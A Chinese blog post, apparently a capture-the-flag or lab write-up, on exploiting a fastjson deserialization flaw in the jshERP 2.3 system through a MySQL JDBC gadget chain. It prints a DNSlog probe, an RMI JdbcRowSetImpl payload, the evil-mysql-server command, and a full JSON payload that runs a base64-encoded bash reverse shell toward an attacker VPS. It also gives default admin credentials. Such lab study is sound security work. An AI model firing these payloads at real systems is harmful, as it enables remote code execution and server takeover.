fastjson 反序列化之mysql JDBC 利用

最新推荐文章于 2024-05-09 14:38:44 发布
最新推荐文章于 2024-05-09 14:38:44 发布
阅读量2.5k 收藏 6
点赞数
分类专栏: 笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42077227/article/details/130236560
版权

前言:
在打春秋云境Exchange 靶场时,入口点是华夏ERP 2.3版本系统,存在fastjson 反序列化漏洞,在尝试常见的fastjson利用链反弹shell都没有反应,最终使用mysql JDBC利用链反弹shell成功。在此记录一下。

复现本地靶场搭建

在打靶场过程中,迟迟没有利用成功,在本地搭建靶场先进行反序列化利用测试,github下载jshERP-2.3版本源码。
本地用到的工具和数据库环境:

1. IntelliJ IDEA 2020.3.2(使用tomcat 8.5.34,jdk8)
2. 10.3.7-MariaDB(mysql 5.7

1、使用IDEA打开下载的jshERP-2.3项目源码,修改配置文件

修改application.properties配置文件的数据库连接用户密码

在这里插入图片描述

我这里使用的tomcat为8.5.34版本

在这里插入图片描述

2、导入数据库

本地创建jsh_erp数据库,导入jsh_erp.sql文件执行生成表数据

在这里插入图片描述

3、运行靶场

运行ErpApplication 入口文件,启动靶场,无报错成功运行。

在这里插入图片描述

4、反序列化利用

靶场入口是华夏ERP系统,默认管理员账号密码可以进行登录:admin/123456

在这里插入图片描述
登录到后台,华夏ERP系统历史版本中存在很多漏洞的,包括fastjson 反序列化漏洞,这里在用户管理查询中触发

在这里插入图片描述

验证fastjson 反序列化漏洞存在payload:


{"@type":"java.net.Inet4Address","val":"fvnp2k.dnslog.cn"}
进行url编码后在search值发送

burp中进行数据包发送
在这里插入图片描述
dnslog收到消息
在这里插入图片描述

后续中在利用fastjson 反序列化执行命令都是无一失败,IDEA中看到都是类似失败提示not support com.sun.rowset.JdbcRowSetImpl,不支持这些利用链如下,还有更多的这里没有列出来

exp:
{
	"@type":"com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName":"rmi://xxx.xx.xx.xx:1099/Exploit", "autoCommit":true
}

在这里插入图片描述

在搜索fastjson 反序列化与JDBC之后发现可以使用fastjson加mysql反序列化,细看了解之后复现测试
参考1:

在这里插入图片描述

http://www.bmth666.cn/bmth_blog/2022/10/19/Fastjson%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/#%E8%93%9D%E5%B8%BD%E6%9D%AF2022%E5%86%B3%E8%B5%9B-%E8%B5%8C%E6%80%AA

参考2:
在这里插入图片描述

https://www.cnblogs.com/kingbridge/articles/16720318.html

从华夏ERP源码配置使用的依赖符合触发条件

在这里插入图片描述

evil-mysql-server、ysoserial-all.jar

在复现中需要使用到evil-mysql-server、ysoserial-all.jar 反序列化利用工具

evil-mysql-server是一个针对 jdbc 反序列化漏洞编写的恶意数据库,依赖 ysoserial
在这里插入图片描述

ysoserial-all.jar: java反序列利用神器

下载地址:
https://github.com/dushixiang/evil-mysql-server
https://github.com/su18/ysoserial

反弹shell

在vps服务器上下载evil-mysql-server、ysoserial-all.jar工具回来放在同一目录下,执行命令运行

./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-all.jar

用到的Fastjson 反序列化exp ,只需要修改vpsIP地址和要执行的命令(base64编码后的命令)

{
	"name": {
		"@type": "java.lang.AutoCloseable",
		"@type": "com.mysql.jdbc.JDBC4Connection",
		"hostToConnectTo": "vpsIP地址",
		"portToConnectTo": 3306,
		"info": {
			"user": "yso_CommonsCollections6_bash -c {echo,base64编码后的命令}|{base64,-d}|{bash,-i}",
			"password": "pass",
			"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
			"autoDeserialize": "true",
			"NUM_HOSTS": "1"
		}
	}

url编码后发送

在这里插入图片描述

vps中收到了数据请求,由于靶场是windows系统不能反弹shell,但是可以看到靶场服务器向vps请求, 执行了恶意的反序列化代码

在这里插入图片描述

最后发现可行之后,也是立马开启了春秋云境Exchange 靶场,使用fastjson+mysql JDBC利用链反弹shell成功

在这里插入图片描述
在这里插入图片描述

隐形卟
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一起来看看Fastjson的三种漏洞利用
程序猿DD
08-24 1766
作者 |4ra1n来源 |https://www.anquanke.com/post/id/248892Fastjson已被大家分析过很多次,本文主要是对三种利用做分析和对比Jdbc...
Fastjson漏洞利用合集
2301_76786857的博客
03-07 1453
FastJson 是Alibaba 的一款开源Json解析库,可用于将Java 对象转换为其Json 表示形式,也可以用于将Json 字符串转换为等效的Java 对象。近几年来FastJson 漏洞层出不穷。RCE漏洞的源头:17年FastJson 爆出的1.2.24 反序列化漏洞。
网络安全-反弹shell详解(攻击,检测与防御)_反弹shell原理及防御方法
最新发布
2401_84264491的博客
05-09 627
如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。
Fastjson JdbcRowSetImpl利用学习
虚幻私塾
04-15 1427
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 JdbcRowSetImpl 接着继续学习fastjson的第二条JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体set
Java代码审计——fastjson 1.2.68 反序列化漏洞 Mysql RCE
王嘟嘟的博客
03-21 5702
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 0x01 环境 首先是版本问题: fastjson 1.2.39-1.2.68 mysql 5.1.11- 8.x 默认Gadget maven <dependency> <groupId>mysql</groupId> <artifactId>mysql-con
fastjson 序列化 不包括转义字符_FASTJSON反序列化和构造函数之间的一点小秘密
weixin_39798943的博客
11-17 233
推荐阅读:学会这些微服务+Tomcat+NGINX+MySQL+Redis,再去面试阿里P7岗吧“火爆”的微服务架构你还不会?从基础到原理的PDF文档快来学!阿里架构师精选Spring Cloud+JVM+MySQL+分布式缓存PDF文档分享FastJson想必大家都很熟悉了,很常见的Json序列化工具。今天在下要和大家分享一波FastJson反序列化和构造函数之间的一点小秘密。 下面先进入大家都...
com.alibaba.fastjson.JSONException********com.mysql.jdbc.JDBC4DatabaseMetaData, fieldName : metaData
晓梦初醒的博客
07-23 523
com.alibaba.fastjson.JSONException: write javaBean error, fastjson version 1.2.56, class org.springframework.boot.web.servlet.context.AnnotationConfigServletWebServerApplicationContext, fieldName : applicationContext, write javaBean error, fastjson versio.
mysql 反序列化函数_phar反序列化
weixin_42529544的博客
01-21 1006
phar反序列化前段时间纵横杯遇到一题反序列化,当时队友做出来了,赛后尝试复现一下,并总结反序列化内容phar的本质是一种压缩文件,会以序列化的形式存储用户自定义的meta-dataPhar文件结构stub:phar文件标识,以 __HALT_COMPILER();?>结尾manifest:压缩文件的属性等信息,以序列化的形式存储自定义的meta-datacontents:压缩文件的内容si...
jdbc+fastjson
08-09
下载资源之后将资源解压开,然后导入eclipse中就可以了。如果是web项目注意还要将资源放在WEB-INF目录下的lib文件夹下面
mysql反序列化_序列化与反序列化(2)
weixin_35698059的博客
01-19 506
自动对象序列化是转换XML和二进制对象的最简单方法。需要特别说明的是,自动对象序列化仅对公有数据类型和公有数据成员有效。 public class Person{ public string FirstName { get; set; } public char MiddleInitial { get; set; } public string LastName自动对象序列化是转换XML和二进制对...
Java代码审计——Fastjson JdbcRowSetImpl调用
王嘟嘟的博客
12-09 1200
0x00 前言 反序列化总纲 单独的把fastjson的调用拎出来进行分析。 fastjson可参考:https://blog.csdn.net/qq_36869808/article/details/121697765?spm=1001.2014.3001.5501 0x01 JdbcRowSetImpl 这里要是需要使用JNDI就必须通过lookup方法,这个参考:待填坑。 首先来看fastjson payload,有两个参数:一个是dataSourceName,另外一个是autoCommit {"@
1.2.24 Fastjson反序列化TemplatesImpl和JdbcRowSetImpl利用分析(非常详细)
dreamthe的博客
07-07 2187
本文的关于Fastjson1.2.24版本TemplatesImpl利用的分析非常详细,如果你不是很熟悉该利用,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
Java反序列化(之)Mysql JDBC 反序列化分析
Vicl1fe的博客
02-19 747
前言 搞fastjson的时候又又又又又又遇到个经常听到但没研究过的,就是Mysql JDBC反序列化,准备最近这段时间把它拿下。 Mysql Jdbc文件读取 首先加上我们的Mysql Jdbc环境 <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>8.0.13</ve
java序列化/反序列化对象到mysql
移动开发
07-24 1623
How to save a complex java object in a MySQL table If you want to save complex java objects to MySQL you can serialize and save them as BLOB in a MySQL table. For example you have an object “com
【JAVA反序列化学习5】fastjson反序列化JdbcRowSetImpl类JNDI注入分析
GX233的博客
06-01 897
fastjson反序列化JdbcRowSetImpl类JNDI注入
fastjson反序列化分析与bypass
灰太的表格的博客
03-15 749
a_g_e。
3 ,登录页面,Servlet 回顾,jdbc 回顾,ajax 回顾 ,FastJson 使用,一些异常的处理
孙砚秋的博客
12-26 197
1 ,登录页面 :http://localhost:8080/lifecycle/ 2 ,注册页面 : 3 ,把 Tomcat 中的包引入到 Idea : tomcat 与 servlet 的版本对应关系 : https://blog.csdn.net/majiang26/article/details/80052346 我们的 tomcat 版本 : 8.5.42 所以,我们需要的 Se...
详解Mysql中的JSON系列操作函数
zhuimengzhe5的博客
11-23 3640
新版 Mysql 中加入了对 JSON Document 的支持,可以创建 JSON 类型的字段,并有一套函数支持对JSON的查询、修改等操作,下面就实际体验一下 MySQL5.7发布后,专门设计了JSON数据类型以及关于这种类型的检索以及其他函数解析。 下面一起来实际操作一下。 创建带有 JSON 字段的表 比如一个‘文章'表,字段包括 id、标题 ti
反序列化学习 -- Fastjson
05-31 301
fastjson是之前比较流行的第三方json库。官方文档宣称其性能测试第一,并且给了图本文讲解fastjson.net的反序列化漏洞demo一个最小的序列化demousing fastJSON; using System; namespace Fastjson.NetSerializer { class Person { public...
fastjson反序列化复现
08-12
Fastjson反序列化漏洞是指在反序列化过程中,攻击者可以构造恶意的JSON字符串,通过利用Fastjson的特性和漏洞来执行任意代码。具体的复现过程如下: 1. 构造恶意的JSON字符串,其中包含需要执行的代码。可以利用已知的反序列化漏洞利用,或者自行构造payload。 2. 将恶意的JSON字符串传入Fastjson反序列化函数,例如`JSON.parseObject(jsonString, targetClass)`。 3. Fastjson反序列化过程中会调用目标类的getter和setter方法,将JSON字符串还原成对象。恶意代码会在这个过程中被执行。 需要注意的是,Fastjson已经在较新的版本中修复了一些已知的反序列化漏洞,并增加了一些安全措施来防御这些漏洞。因此,要成功复现Fastjson反序列化漏洞,需要使用较旧的版本或者找到新的漏洞利用方式绕过这些安全措施。同时,在实际应用中,为了保证安全性,建议使用最新的Fastjson版本,并对输入进行严格的校验和过滤,以防止恶意代码的注入。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【漏洞复现】Fastjson反序列化](https://blog.csdn.net/m0_46363249/article/details/122260021)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值